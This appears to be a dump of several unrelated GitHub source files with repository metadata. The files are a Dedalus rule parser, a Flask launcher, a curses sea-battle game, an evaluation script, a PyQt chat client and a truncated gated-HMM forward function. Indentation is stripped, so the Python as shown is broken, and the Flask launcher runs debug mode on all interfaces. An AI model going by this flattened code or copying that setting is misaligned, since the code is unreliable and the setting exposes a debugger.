# ------------------------------------------------------ #
#############
# GLOBALS #
#############
eqnOps = [ "==", "!=", ">=", "<=", ">", "<" ]
opList = eqnOps + [ "+", "-", "/", "*" ]
aggOps = [ "min", "max", "sum", "count", "avg" ]
##################
# CLEAN RESULT #
##################
# input pyparse object of the form ([...], {...})
# output only [...]
def cleanResult( result ) :
newResult = []
numParsedStrings = len(result)
for i in range(0, numParsedStrings) :
newResult.append( result[i] )
return newResult
###########
# PARSE #
###########
# input a ded line
# output parsed line
# fact returns : [ 'fact', { relationName:'relationNameStr', dataList:[ data1, ... , dataN ], factTimeArg:<anInteger> } ]
# rule returns : [ 'rule',
# { relationName : 'relationNameStr',
# goalAttList:[ data1, ... , dataN ],
# goalTimeArg : ""/next/async,
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ],
# eqnDict : { 'eqn1':{ variableList : [ 'var1', ... , 'varI' ] },
# ... ,
# 'eqnM':{ variableList : [ 'var1', ... , 'varJ' ] } } } ]
def parse( dedLine, settings_path ) :
logging.debug( " PARSE : dedLine = '" + dedLine + "'" )
# ---------------------------------------------------- #
# CASE : line is empty
if dedLine == "" :
return None
# ---------------------------------------------------- #
# CASE : line missing semicolon
elif not ";" in dedLine :
sys.exit( " PARSE : ERROR : missing semicolon in line '" + dedLine + "'" )
# ---------------------------------------------------- #
# CASE : line is an include
elif dedLine.startswith( 'include"' ) or dedLine.startswith( "include'" ) :
pass
# ---------------------------------------------------- #
# CASE : line is a FACT
elif not ":-" in dedLine :
if not sanityCheckSyntax_fact_preChecks( dedLine ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
factData = {}
# ///////////////////////////////// #
# get relation name
relationName = dedLine.split( "(", 1 )[0]
# ///////////////////////////////// #
# get data list
dataList = dedLine.split( "(", 1 )[1] # string
dataList = dataList.split( ")", 1 )[0] # string
dataList = dataList.split( "," )
# ///////////////////////////////// #
# get time arg
ampersandIndex = dedLine.index( "@" )
factTimeArg = dedLine[ ampersandIndex + 1 : ]
factTimeArg = factTimeArg.replace( ";", "" ) # remove semicolons
# ///////////////////////////////// #
# save fact information
factData[ "relationName" ] = relationName
factData[ "dataList" ] = dataList
factData[ "factTimeArg" ] = factTimeArg
if not sanityCheckSyntax_fact_postChecks( dedLine, factData ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
logging.debug( " PARSE : returning " + str( [ "fact", factData ] ) )
return [ "fact", factData ]
# ---------------------------------------------------- #
# CASE : line is a RULE
#
# rule returns : [ 'rule',
# { relationName : 'relationNameStr',
# goalAttList:[ data1, ... , dataN ],
# goalTimeArg : ""/next/async,
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ],
# eqnDict : { 'eqn1':{ variableList : [ 'var1', ... , 'varI' ] },
# ... ,
# 'eqnM':{ variableList : [ 'var1', ... , 'varJ' ] } } } ]
elif ":-" in dedLine :
if not sanityCheckSyntax_rule_preChecks( dedLine ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
ruleData = {}
# ///////////////////////////////// #
# get relation name
relationName = dedLine.split( "(", 1 )[0]
ruleData[ "relationName" ] = relationName
# ///////////////////////////////// #
# get goal attribute list
goalAttList = dedLine.split( "(", 1 )[1] # string
goalAttList = goalAttList.split( ")", 1 )[0] # string
goalAttList = goalAttList.split( "," )
ruleData[ "goalAttList" ] = goalAttList
# ///////////////////////////////// #
# get goal time argument
goalTimeArg = dedLine.split( ":-", 1 )[0] # string
try :
goalTimeArg = goalTimeArg.split( "@", 1 )[1] # string
except IndexError :
goalTimeArg = ""
ruleData[ "goalTimeArg" ] = goalTimeArg
# ///////////////////////////////// #
# parse the rule body for the eqn list
eqnDict = getEqnDict( dedLine )
ruleData[ "eqnDict" ] = eqnDict
# ///////////////////////////////// #
# parse the rule body for the eqn list
subgoalListOfDicts = getSubgoalList( dedLine, eqnDict )
ruleData[ "subgoalListOfDicts" ] = subgoalListOfDicts
logging.debug( " PARSE : relationName = " + str( relationName ) )
logging.debug( " PARSE : goalAttList = " + str( goalAttList ) )
logging.debug( " PARSE : goalTimeArg = " + str( goalTimeArg ) )
logging.debug( " PARSE : subgoalListOfDicts = " + str( subgoalListOfDicts ) )
logging.debug( " PARSE : eqnDict = " + str( eqnDict ) )
if not sanityCheckSyntax_rule_postChecks( dedLine, ruleData, settings_path ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
logging.debug( " PARSE : returning " + str( [ "rule", ruleData ] ) )
return [ "rule", ruleData ]
# ---------------------------------------------------- #
# CASE : wtf???
else :
sys.exit( " PARSE : ERROR : this line is not an empty, a fact, or a rule : '" + dedLine + "'. aborting..." )
##########################
# CONTAINS NO SUBGOALS #
##########################
# make cursory checks to determine if the input rule line contains subgoals
def containsNoSubgoals( dedLine ) :
body = getBody( dedLine )
# ------------------------------------- #
# CASE : no open parenthesis to demark
# attribute list start
if "(" in body :
return False
# ------------------------------------- #
# CASE : no closed parenthesis to demark
# attribute list end
elif ")" in body :
return False
# ------------------------------------- #
# CASE : no commas to delimit subgoals
elif "," in body :
return False
# ------------------------------------- #
# otherwise, probably incorrect
else :
return True
#############
# HAS AGG #
#############
# check if the input attribute contains one
# of the supported aggregate operations.
def hasAgg( attStr ) :
flag = False
for agg in aggOps :
if agg+"<" in attStr :
flag = True
return flag
##################
# IS FIXED STR #
##################
# check if the input attribute is a string,
# as indicated by single or double quotes
def isFixedStr( att ) :
if att.startswith( "'" ) and att.startswith( "'" ) :
return True
elif att.startswith( '"' ) and att.startswith( '"' ) :
return True
else :
return False
##################
# IS FIXED INT #
##################
# check if input attribute is an integer
def isFixedInt( att ) :
if att.isdigit() :
return True
else :
return False
###########################################
# CHECK MIN ONE POS SUBGOAL NO TIME ARG #
###########################################
# make sure at least one positive subgoal
# has no numeric time argument
def check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData ) :
if not hasPosSubgoalWithoutIntegerTimeArg( ruleData ) :
raise Exception( " SANITY CHECK SYNTAX RULE POST CHECKS : ERROR : " + \
" invalid syntax in line \n'" + ruleLine + \
"'\n line at least one positive subgoal " + \
"must not be annotated with a numeric time argument." )
################################
# CHECK IDENTICAL FIRST ATTS #
################################
# make sure all subgoals
# have identical first attributes
def check_identical_first_atts( ruleLine, ruleData ) :
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
firstAtts = []
for sub in subgoalListOfDicts :
subgoalAttList = sub[ "subgoalAttList" ]
firstAtts.append( subgoalAttList[0] )
firstAtts = set( firstAtts )
if not len( firstAtts ) < 2 :
raise Exception( " SANITY CHECK SYNTAX RULE : ERROR : " + \
"invalid syntax in line \n'" + ruleLine + \
"'\n all subgoals in next and async " + \
"rules must have identical first attributes.\n" )
##########################################
# SANITY CHECK SYNTAX RULE POST CHECKS #
##########################################
# make sure contents of rule make sense.
def sanityCheckSyntax_rule_postChecks( ruleLine, ruleData, settings_path ) :
# ------------------------------------------ #
# make sure all subgoals in next and async
# rules have identical first attributes
try :
use_hacks = tools.getConfig( settings_path, "DEFAULT", "USE_HACKS", bool )
if use_hacks :
if ruleData[ "goalTimeArg" ] == "next" :
check_identical_first_atts( ruleLine, ruleData )
else :
check_min_one_pos_subgoal_no_time_arg( ruleData )
if ruleData[ "goalTimeArg" ] == "next" or ruleData[ "goalTimeArg" ] == "async" :
check_identical_first_atts( ruleLine, ruleData )
except ConfigParser.NoOptionError :
logging.warning( "WARNING : no 'USE_HACKS' defined in 'DEFAULT' section of settings.ini ...running without wildcard rewrites." )
check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData )
if ruleData[ "goalTimeArg" ] == "next" or ruleData[ "goalTimeArg" ] == "async" :
check_identical_first_atts( ruleLine, ruleData )
# ------------------------------------------ #
# make sure all goal and subgoal attribute
# variables start with a captial letter
goalAttList = ruleData[ "goalAttList" ]
for att in goalAttList :
if not att[0].isalpha() or not att[0].isupper() :
if not hasAgg( att ) : # att is not an aggregate call
if not isFixedStr( att ) : # att is not a fixed data input
if not isFixedInt( att ) : # att is not a fixed data input
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n the goal contains contains an attribute not starting with a capitalized letter: '" + att + "'. \n attribute variables must start with an upper case letter." )
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
for sub in subgoalListOfDicts :
subgoalAttList = sub[ "subgoalAttList" ]
for att in subgoalAttList :
if not att[0].isalpha() or not att[0].isupper() :
if not hasAgg( att ) : # att is not an aggregate call
if not isFixedStr( att ) : # att is not a fixed data input
if not isFixedInt( att ) : # att is not a fixed data input
# subgoals can have wildcards
if not att[0] == "_" :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n subgoal '" + sub[ "subgoalName" ] + "' contains an attribute not starting with a capitalized letter: '" + att + "'. \n attribute variables must start with an upper case letter." )
# ------------------------------------------ #
# make sure all relation names are
# lower case
goalName = ruleData[ "relationName" ]
for c in goalName :
if c.isalpha() and not c.islower() :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n The goal name '" + goalName + "' contains an upper-case letter. \n relation names must contain only lower-case characters." )
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
for sub in subgoalListOfDicts :
subName = sub[ "subgoalName" ]
for c in subName :
if c.isalpha() and not c.islower() :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n The subgoal name '" + subName + "' contains an upper-case letter. \n relation names must contain only lower-case characters." )
return True
##############################################
# HAS POS SUBGOAL WITHOUT INTEGER TIME ARG #
##############################################
# check make sure the line contains at least
# one positive subgoal NOT annotated with an
# integer time argument
def hasPosSubgoalWithoutIntegerTimeArg( ruleData ) :
goalTimeArg = ruleData[ "goalTimeArg" ]
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
# ------------------------------------------ #
# CASE : rule is either next or async
# the clock goal is always initially positive
if not goalTimeArg == "" :
return True
# ------------------------------------------ #
# CASE : rule is deductive
# need to check more closely for deductive rules
else :
for subgoal in subgoalListOfDicts :
if subgoal[ "polarity"] == "" : # positive
if not subgoal[ "subgoalTimeArg" ].isdigit() :
return True
return False
#########################################
# SANITY CHECK SYNTAX RULE PRE CHECKS #
#########################################
# make an initial pass on the rule syntax
def sanityCheckSyntax_rule_preChecks( ruleLine ) :
# make sure the line likely has subgoal(s)
if containsNoSubgoals( ruleLine ) :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains no detected subgoals." )
# make sure parentheses make sense
if not ruleLine.count( "(" ) == ruleLine.count( ")" ) :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent counts for '(' and ')'" )
# make sure number of single is even
if not ruleLine.count( "'" ) % 2 == 0 :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent use of single quotes." )
# make sure number of double quotes is even
if not ruleLine.count( '"' ) % 2 == 0 :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent use of single quotes." )
return True
##################
# GET EQN DICT #
##################
# get the complete dictionary of equations in the given rule line
def getEqnDict( dedLine ) :
eqnDict = {}
body = getBody( dedLine )
body = body.split( "," )
# get the complete list of eqns from the rule body
eqnList = []
for thing in body :
if isEqn( thing ) :
eqnList.append( thing )
# get the complete list of variables per eqn
for eqn in eqnList :
varList = getEqnVarList( eqn )
eqnDict[ eqn ] = varList
return eqnDict
######################
# GET EQN VAR LIST #
######################
def getEqnVarList( eqnString ) :
for op in opList :
eqnString = eqnString.replace( op, "___COMMA___" )
varList = eqnString.split( "___COMMA___" )
return varList
######################
# GET SUBGOAL LIST #
######################
# get the complete list of subgoals in the given rule line
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ]
def getSubgoalList( dedLine, eqnList ) :
subgoalListOfDicts = []
# ========================================= #
# replace eqn instances in line
for eqn in eqnList :
dedLine = dedLine.replace( eqn, "" )
dedLine = dedLine.replace( ",,", "," )
# ========================================= #
# grab subgoals
# grab indexes of commas separating subgoals
indexList = getCommaIndexes( getBody( dedLine ) )
#print indexList
# replace all subgoal-separating commas with a special character sequence
body = getBody( dedLine )
tmp_body = ""
for i in range( 0, len( body ) ) :
if not i in indexList :
tmp_body += body[i]
else :
tmp_body += "___SPLIT___HERE___"
body = tmp_body
#print body
# generate list of separated subgoals by splitting on the special
# character sequence
subgoals = body.split( "___SPLIT___HERE___" )
# remove empties
tmp_subgoals = []
for sub in subgoals :
if not sub == "" :
tmp_subgoals.append( sub )
subgoals = tmp_subgoals
# ========================================= #
# parse all subgoals in the list
for sub in subgoals :
#print sub
currSubData = {}
if not sub == "" :
# get subgoalTimeArg
try :
ampersandIndex = sub.index( "@" )
subgoalTimeArg = sub[ ampersandIndex + 1 : ]
sub = sub.replace( "@" + subgoalTimeArg, "" ) # remove the time arg from the subgoal
except ValueError :
subgoalTimeArg = ""
# get subgoal name and polarity
data = sub.replace( ")", "" )
data = data.split( "(" )
subgoalName = data[0]
subgoalName = subgoalName.replace( ",", "" ) # remove any rogue commas
if " notin " in subgoalName :
polarity = "notin"
subgoalName = subgoalName.replace( " notin ", "" )
else :
polarity = ""
# get subgoal att list
subgoalAttList = data[1]
subgoalAttList = subgoalAttList.split( "," )
# collect subgoal data
currSubData[ "subgoalName" ] = subgoalName
currSubData[ "subgoalAttList" ] = subgoalAttList
currSubData[ "polarity" ] = polarity
currSubData[ "subgoalTimeArg" ] = subgoalTimeArg
# save data for this subgoal
subgoalListOfDicts.append( currSubData )
#print subgoalListOfDict
#sys.exit( "foo" )
return subgoalListOfDicts
#######################
# GET COMMA INDEXES #
#######################
# given a rule body, get the indexes of commas separating subgoals.
def getCommaIndexes( body ) :
underscoreStr = getCommaIndexes_helper( body )
indexList = []
for i in range( 0, len( underscoreStr ) ) :
if underscoreStr[i] == "," :
indexList.append( i )
return indexList
##############################
# GET COMMA INDEXES HELPER #
##############################
# replace all paren contents with underscores
def getCommaIndexes_helper( body ) :
# get the first occuring paren group
nextParenGroup = "(" + re.search(r'\((.*?)\)',body).group(1) + ")"
# replace the group with the same number of underscores in the body
replacementStr = ""
for i in range( 0, len(nextParenGroup)-2 ) :
replacementStr += "_"
replacementStr = "_" + replacementStr + "_" # use underscores to replace parentheses
body = body.replace( nextParenGroup, replacementStr )
# BASE CASE : no more parentheses
if not "(" in body :
return body
# RECURSIVE CASE : yes more parentheses
else :
return getCommaIndexes_helper( body )
############
# IS EQN #
############
# check if input contents from the rule body is an equation
def isEqn( sub ) :
flag = False
for op in eqnOps :
if op in sub :
flag = True
return flag
##############
# GET BODY #
##############
# return the body str from the input rule
def getBody( query ) :
body = query.replace( "notin", "___NOTIN___" )
body = body.replace( ";", "" )
body = body.translate( None, string.whitespace )
body = body.split( ":-" )
body = body[1]
body = body.replace( "___NOTIN___", " notin " )
return body
##############################
# SANITY CHECK SYNTAX FACT #
##############################
# check fact lines for invalud syntax.
# abort if invalid syntax found.
# return True otherwise.
def sanityCheckSyntax_fact_preChecks( factLine ) :
logging.debug( " SANITY CHECK SYNTAX FACT : running process..." )
logging.debug( " SANITY CHECK SYNTAX FACT : factLine = " + str( factLine ) )
# ------------------------------------------ #
# facts must have time args.
if not "@" in factLine :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line does not contain a time argument.\n" )
# ------------------------------------------ #
# check parentheses
if not factLine.count( "(" ) < 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains more than one '('\n" )
elif not factLine.count( "(" ) > 0 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains fewer than one '('\n" )
if not factLine.count( ")" ) < 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains more than one ')'\n" )
elif not factLine.count( ")" ) > 0 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains fewer than one ')'\n" )
return True
##########################################
# SANITY CHECK SYNTAX FACT POST CHECKS #
##########################################
# check fact lines for invalud syntax.
# abort if invalid syntax found.
# return True otherwise.
def sanityCheckSyntax_fact_postChecks( factLine, factData ) :
logging.debug( " SANITY CHECK SYNTAX FACT : running process..." )
logging.debug( " SANITY CHECK SYNTAX FACT : factData = " + str( factData ) )
# ------------------------------------------ #
# check quotes on input string data
dataList = factData[ "dataList" ]
for data in dataList :
logging.debug( " SANITY CHECK SYNTAX FACT : data = " + str( data ) + ", type( data ) = " + str( type( data) ) + "\n" )
if isString( data ) :
# check quotes
if not data.count( "'" ) == 2 and not data.count( '"' ) == 2 :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in fact '" + \
str( factLine ) + "'\n fact definition contains string data not " + \
"surrounded by either exactly two single quotes or exactly two double quotes : " + data + "\n" )
else :
pass
# ------------------------------------------ #
# check time arg
factTimeArg = factData[ "factTimeArg" ]
print "factTimeArg = " + str( factTimeArg )
if not factTimeArg.isdigit() and \
not factTimeArg == "constant" :
sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid " + \
"syntax in fact data list '" + str( factLine ) + \
"'\n fact definition has no valid time arg." )
return True
###############
# IS STRING #
###############
# test if the input string contains any alphabetic characters.
# if so, then the data is a string.
def isString( testString ) :
logging.debug( " IS STRING : testString = " + str( testString ) )
alphabet = [ 'a', 'b', 'c', \
'd', 'e', 'f', \
'g', 'h', 'i', \
'j', 'k', 'l', \
'm', 'n', 'o', \
'p', 'q', 'r', \
's', 't', 'u', \
'v', 'w', 'x', \
'y', 'z' ]
flag = False
for character in testString :
if character.lower() in alphabet :
flag = True
logging.debug( " IS STRING : flag = " + str( flag ) )
return flag
###################
# PARSE DEDALUS #
###################
# input name of raw dedalus file
# output array of arrays containing the contents of parsed ded lines
def parseDedalus( dedFile, settings_path ) :
logging.debug( " PARSE DEDALUS : dedFile = " + dedFile )
parsedLines = []
# ------------------------------------------------------------- #
# remove all multiline whitespace and place all rules
# on individual lines
lineList = sanitizeFile( dedFile )
# ------------------------------------------------------------- #
# iterate over each line and parse
for line in lineList :
result = parse( line, settings_path ) # parse returns None on empty lines
if result :
parsedLines.append( result )
logging.debug( " PARSE DEDALUS : parsedLines = " + str( parsedLines ) )
return parsedLines
# ------------------------------------------------------------- #
###################
# SANITIZE FILE #
###################
# input all lines from input file
# combine all lines into a single huge string.
# to preserve syntax :
# replace semicolons with string ';___NEWLINE___'
# replace all notins with '___notin___'
# split on '___NEWLINE__'
def sanitizeFile( dedFile ) :
bigLine = ""
# "always check if files exist" -- Ye Olde SE proverb
if os.path.isfile( dedFile ) :
f = open( dedFile, "r" )
# combine all lines into one big line
for line in f :
#print "old_line = " +str( line )
line = line.replace( "//", "___THISISACOMMENT___" )
line = line.split( "___THISISACOMMENT___", 1 )[0]
#print "new_line = " +str( line )
line = line.replace( "notin", "___notin___" ) # preserve notins
line = line.replace( ";", ";___NEWLINE___" ) # preserve semicolons
line = line.translate( None, string.whitespace ) # remove all whitespace
bigLine += line
f.close()
bigLine = bigLine.replace( "___notin___", " notin " ) # restore notins
lineList = bigLine.split( "___NEWLINE___" ) # split big line into a list of lines
# remove duplicates
final_lineList = []
for line in lineList :
if not line in final_lineList :
final_lineList.append( line )
return final_lineList
else :
sys.exit( "ERROR: File at " + dedFile + " does not exist.\nAborting..." )
#########
# EOF #
#########
|
[
"kdahlgren15@gmail.com"
] |
kdahlgren15@gmail.com
|
6d5e991fc2b55c73e9b32da5c9d0db6a146186b2
|
a22054032f23d84f34741532aaca5fe46e23a552
|
/run_app_dev.py
|
6fae0d484a2796685d1401726f30707b1548e9fc
|
[] |
no_license
|
BearChao/transfer
|
622003bfb0b2b7c8da6287a65764c69ad81f3d9c
|
4159a596d0f5c728f6ce27568beb21c2ba321846
|
refs/heads/master
| 2021-05-23T06:08:01.183541
| 2018-05-28T14:39:30
| 2018-05-28T14:39:30
| 94,799,123
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from app import create_app
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True)
|
[
"zynick@foxmail.com"
] |
zynick@foxmail.com
|
65c81b2c37dfa24b81ae8c97d1e1d2f37c8af03a
|
b926393a43850799f57b59202796d128c5b611ab
|
/main.py
|
162002374fe6c83445e2d99937a3a90f3ac936c1
|
[] |
no_license
|
apustovitin/sea-battle
|
0435e697b2143e80fdd04cbabbd5a51f18536c0c
|
2546d9f296a7bd3a8e84af3bd0439b21180d27f6
|
refs/heads/master
| 2023-01-18T18:03:27.210594
| 2020-12-01T14:09:33
| 2020-12-01T14:09:33
| 317,479,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,482
|
py
|
import curses
import board_image
from game import Game
import random
def moves_loop(game):
if random.choice([False, True]):
is_break, is_restart = game.computer_move()
if is_break or is_restart:
return is_break, is_restart
while True:
is_break, is_restart = game.player_move()
if is_break or is_restart:
return is_break, is_restart
is_break, is_restart = game.computer_move()
if is_break or is_restart:
return is_break, is_restart
def game_loop(stdscr):
unknown_ships = [1, 1, 1, 1, 2, 2, 2, 3, 3, 4]
while True:
stdscr.clear()
computer_board = board_image.BoardImage()
player_board = board_image.BoardImage()
player_board_image = board_image.BoardImage()
game = Game(stdscr, ".\screen_layout.txt", unknown_ships, computer_board, player_board, player_board_image)
game.place_computer_ships()
game.print_screen_layout()
is_break, is_restart = game.place_player_ships()
if is_break:
break
if is_restart:
continue
is_break, is_restart = moves_loop(game)
if is_break:
break
if is_restart:
continue
def main():
stdscr = curses.initscr()
stdscr.clear()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.keypad(True)
game_loop(stdscr)
curses.endwin()
if __name__ == '__main__':
main()
|
[
"apustovitin@gmail.com"
] |
apustovitin@gmail.com
|
36719882d3b660fcaa5d889e59fee49bb5b86525
|
a6ae6b2bb64b622338fc001b30a9f053717cc770
|
/toVOC/evaluation/evalute.py
|
ae710a548491b2f324491b17a26f860d2fca267c
|
[] |
no_license
|
tianws/script
|
1bec9f549fd801b5848f33f243d32db5bdd61722
|
3ecf2bca42e8c6c7f6a964ddc42acc3e483387fc
|
refs/heads/master
| 2021-06-04T11:53:32.337079
| 2021-01-12T08:20:13
| 2021-01-12T08:20:13
| 98,512,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,534
|
py
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import division, unicode_literals
import argparse
import logging
import phodopus
import squirrel
import sys
if sys.version_info.major == 2:
from pathlib2 import Path
else:
from pathlib import Path
if __name__ == '__main__':
logging.basicConfig(
format='%(levelname)s:%(message)s', level=logging.INFO)
parser = argparse.ArgumentParser(
description='通过比较现成的识别输出文件(log)和标注文件(txt),以测评车尾或车道的识别效果')
parser.add_argument('log_pathname', action='store', type=Path)
parser.add_argument('label_pathname', action='store', type=Path)
group = parser.add_mutually_exclusive_group()
group.add_argument(
'-s', action='store_const', dest='module',
const=squirrel, help='squirrel')
group.add_argument(
'-p', action='store_const', dest='module',
const=phodopus, help='phodopus')
args = parser.parse_args(sys.argv[1:])
if args.module is None:
logging.error('You should choose -s or -p! See -h')
tp_count, fp_count, fn_count = args.module.parse(
args.log_pathname,
args.label_pathname)
precision, recall, fb_measure, _ = args.module.statistics(
tp_count,
fp_count,
fn_count)
logging.info('precision: {:.3}'.format(precision))
logging.info('recall: {:.3}'.format(recall))
logging.info('fb_measure: {:.3}'.format(fb_measure))
|
[
"tianws@mapbar.com"
] |
tianws@mapbar.com
|
4069b0b957b7c70d0f9663a86dd1cecb18c73276
|
1069b21592cd0771d69618d292e0511ec98251d9
|
/visual_client10_9.py
|
09d08582ba82f4698edc446c1688a703a3d9fcb8
|
[] |
no_license
|
12Dong/python-socket
|
6936fb6d7984c5948b31ce70837fab3437420b82
|
cdb754a104eb5a0ccdb260eea83a943ce67bf268
|
refs/heads/master
| 2021-08-24T14:06:05.261228
| 2017-12-10T04:42:05
| 2017-12-10T04:42:05
| 113,722,198
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,415
|
py
|
# coding:utf-8
import socket
import threading
import sys
from PyQt5.QtWidgets import QWidget,QApplication,QGridLayout,QLineEdit,QTextEdit,QLabel,QPushButton,QFrame
from PyQt5 import QtCore,QtWidgets
from PyQt5 import QtGui
from PyQt5.QtGui import*
from PyQt5.QtGui import QIcon
host = 'localhost'
port = 9999
username = '12Dong'
class Log(QFrame):
def __init__(self,s):
super().__init__()
self.initUI()
self.s=s
def initUI(self):
self.setObjectName('main')
self.Str = QLabel("Welcome to my chat room.Please input your nickname")
self.Nickname = QLabel('Nickname : ')
self.text = QLineEdit()
self.btnStart = QPushButton("Start!")
grid = QGridLayout()
grid.setSpacing(10)
grid.addWidget(self.Str,2,2,2,5)
grid.addWidget(self.Nickname,3,1,3,1)
grid.addWidget(self.text,3,2,3,4)
grid.addWidget(self.btnStart,3,6,3,6)
self.setLayout(grid)
self.creationAction()
self.setWindowTitle('Title')
self.setGeometry(500, 500, 500, 300)
with open('logbg.qss', 'r') as p:
self.setStyleSheet(p.read())
self.show()
def setNickname(self):
name = str(self.text.text())
self.text.setText('')
s.send(name.encode('utf-8'))
c = Client(name)
c.show()
self.close()
def creationAction(self):
self.btnStart.clicked.connect(self.setNickname)
class Client(QFrame):
def __init__(self, name):
super().__init__()
self.Nickname = name
self.initUI()
def initUI(self):
self.setWindowTitle('Client')
self.setNameWidget = QWidget()#
self.layout = QGridLayout(self)#
self.setNameLayout = QGridLayout(self.setNameWidget)#
self.btnSend = QPushButton('send')#
self.input = QLineEdit()#
self.chat = QTextEdit()#
self.timer = QtCore.QTimer()
self.messages = []
self.build()
self.createAction()
self.setWindowIcon(QIcon("mylove.ico"))
self.Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recvThread = threading.Thread(target=self.recvFromServer) #
recvThread.start()#
self.setGeometry(500,500,600,400)
self.setWindowTitle('Communcation')
with open('texteditbg.qss', 'r') as q:
self.setStyleSheet(q.read())
def sendToServer(self): #
global username
text = str(self.input.text())
self.input.setText('')
if text == 'Exit' or text=='':
self.exit()
try:
s.send(text.encode('utf-8'))
print('%s >> %s' % (username, text))
self.messages.append(self.Nickname+" : " + text )
except ConnectionAbortedError:
print('Server closed this connection!')
self.exit()
except ConnectionResetError:
print('Server is closed!')
self.exit()
def recvFromServer(self): #
while 1:
try:
data = s.recv(1024).decode('utf-8')
if not data:
exit()
print(data)
self.messages.append(data)
except ConnectionAbortedError:
print('Server closed this connection!')
self.exit()
except ConnectionResetError:
print('Server is closed!')
self.exit()
def showChat(self): #
for m in self.messages:
self.chat.append(m)
self.messages = []
def exit(self): #
s.close()
sys.exit()
def build(self):
self.layout.addWidget(self.chat, 0, 0, 5, 4)
self.layout.addWidget(self.input, 5, 0, 1, 3)
self.layout.addWidget(self.btnSend, 5, 3)
self.setLayout(self.layout)
def createAction(self):
self.btnSend.clicked.connect(self.sendToServer)
self.timer.timeout.connect(self.showChat)
self.timer.start(1000)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
address = ('127.0.0.1', 31500)
Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
Sock.sendto(b'1',address)
print(s.recv(1024).decode())
app = QApplication(sys.argv)
log = Log(s)
app.exec_()
#10/4 实现socket通行
#10/6 实现pyqt5封装,界面优化
#10/9 实现udp通信
#made by 12Dong
|
[
"289663639@qq.com"
] |
289663639@qq.com
|
49d3fe6b4ad2a62850cc09fd55ce4e235e09ecce
|
71d304e88e996e695451be82cfb24029b4b2b9dd
|
/ghmm.py
|
98589df3885a5307a587e450b86b7e4dd1c99f84
|
[] |
no_license
|
negar7918/GHMMs
|
7875ab232e36b05febac74c3261aca811a08d77a
|
ea75d0f3bd82c0e2e046d34debff4fd352637819
|
refs/heads/master
| 2021-07-20T13:34:37.444101
| 2020-06-09T17:53:39
| 2020-06-09T17:53:39
| 177,122,775
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,871
|
py
|
# This is the implementation of the new method in the below paper published at AIME 2019:
# "Gated Hidden Markov Models for Early Prediction of Outcome of Internet-based Cognitive Behavioral Therapy"
# This implementation is intended for sequences up to length 150 and for longer ones, one should use log probabilities.
# This implementation was used for binary states in HMM and EM needs only 10 iterations (this fact is published already)
# In case of having more states, one should implement the convergence criteria properly.
# Value -1 is used to represent a missing observation or data point; here we handle missing values without imputation.
import numpy as np
def forward(params, observations, label=None):
pi, A, O = params
N = len(observations)
S = pi.shape[0]
alpha = np.zeros((N, S))
# base case
if observations[0] != -1:
alpha[0, :] = pi * O[:, observations[0]]
# handling missing
else:
alpha[0, :] = pi
# recursive case
for i in range(1, N):
for s2 in range(S):
for s1 in range(S):
transition = A[s1, s2]
# supervised part
if i == N - 1 and label is not None:
if label == s2:
transition = 1
else:
transition = 0
if observations[i] != -1:
